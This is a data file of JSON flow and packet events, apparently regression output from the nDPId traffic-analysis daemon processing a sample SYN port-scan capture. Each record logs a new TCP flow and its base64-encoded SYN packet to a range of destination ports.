+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1928,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1918,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAswtYAADYGT5ysEAAIQA2GNIzTgAfdU4MZAAAAAGACDACshAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1929,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1919,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1929,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1919,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsWhoAACcGx1isEAAIQA2GNIzTD6HdU4MZAAAAAGACEAAY6wAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1930,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1920,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1930,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1920,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsS5QAAC8Gzd6sEAAIQA2GNIzTBwndU4MZAAAAAGACEAAhgwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1931,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1921,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1931,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1921,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsHecAADsG74usEAAIQA2GNIzTCi\/dU4MZAAAAAGACEAAeXQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1932,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1922,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5678,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1932,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1922,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsTZwAADUGxdasEAAIQA2GNIzTFi7dU4MZAAAAAGACCAAaXgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1933,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1923,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3689,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1933,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1923,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsKBoAADoG5lisEAAIQA2GNIzTDmndU4MZAAAAAGACDAAeIwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1934,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1924,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1934,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1924,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsxdYAADMGT5ysEAAIQA2GNIzTC2jdU4MZAAAAAGACEAAdJAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1935,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1925,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1935,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1925,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsPDwAACgG5DasEAAIQA2GNIzSJxzdUoMYAAAAAGACBAANcwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1936,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1926,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061310,"flow_last_seen":1278275061310,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061310,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1936,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1926,"flow_packet_id":1,"flow_last_seen":1278275061310,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061310,"pkt":"ACYLMQczACWzv5HuCABFAAAsPEQAADsG0S6sEAAIQA2GNIzSA\/3dUoMYAAAAAGACEAAkkgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1937,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1927,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061310,"flow_last_seen":1278275061310,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061310,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":60020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1937,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1927,"flow_packet_id":1,"flow_last_seen":1278275061310,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061310,"pkt":"ACYLMQczACWzv5HuCABFAAAsi7EAACcGlcGsEAAIQA2GNIzS6nTdUoMYAAAAAGACEAA+GgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1938,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1928,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061312,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1938,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1928,"flow_packet_id":1,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061312,"pkt":"ACYLMQczACWzv5HuCABFAAAsjGYAADIGigysEAAIQA2GNIzSE4bdUoMYAAAAAGACDAAZCQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1939,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1929,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061312,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1939,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1929,"flow_packet_id":1,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061312,"pkt":"ACYLMQczACWzv5HuCABFAAAsgZEAADgGjuGsEAAIQA2GNIzSE4rdUoMYAAAAAGACBAAhBQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1940,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1930,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061312,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1092,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1940,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1930,"flow_packet_id":1,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061312,"pkt":"ACYLMQczACWzv5HuCABFAAAsWyIAAC8GvlCsEAAIQA2GNIzSBETdUoMYAAAAAGACEAAkSwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1941,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1931,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061312,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1941,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1931,"flow_packet_id":1,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061312,"pkt":"ACYLMQczACWzv5HuCABFAAAsZykAADkGqEmsEAAIQA2GNIzSCDfdUoMYAAAAAGACCAAoWAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1942,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1932,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061312,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1942,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1932,"flow_packet_id":1,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061312,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/+4AADMGFYSsEAAIQA2GNIzSBBndUoMYAAAAAGACEAAkdgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1943,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1933,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1943,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1933,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsxdYAADAGUpysEAAIQA2GNIzSImDdUoMYAAAAAGACBAASLwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1944,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1934,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9290,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1944,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1934,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsGjIAADgG9kCsEAAIQA2GNIzSJErdUoMYAAAAAGACBAAQRQAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1945,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1935,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49152,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1945,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1935,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAscfUAADIGpH2sEAAIQA2GNIzSwADdUoMYAAAAAGACDABsjgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1946,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1936,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1863,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1946,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1936,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAs8oIAACYGL\/CsEAAIQA2GNIzSB0fdUoMYAAAAAGACDAAlSAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1947,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1937,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2401,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1947,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1937,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsznsAACkGUPesEAAIQA2GNIzSCWHdUoMYAAAAAGACCAAnLgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1948,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1938,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1948,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1938,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsFp8AACUGDNSsEAAIQA2GNIzSC9fdUoMYAAAAAGACCAAkuAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1949,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1939,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1949,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1939,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAspUsAACUGfiesEAAIQA2GNIzSATLdUoMYAAAAAGACCAAvXQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1950,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1940,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1812,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1950,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1940,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsYO4AACkGvoSsEAAIQA2GNIzSBxTdUoMYAAAAAGACCAApewAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1951,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1941,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1104,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1951,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1941,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsubMAADUGWb+sEAAIQA2GNIzSBFDdUoMYAAAAAGACCAAsPwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1952,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1942,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1952,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1942,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsfYYAADMGl+ysEAAIQA2GNIzSCp7dUoMYAAAAAGACEAAd8QAAAgQFtA=="} 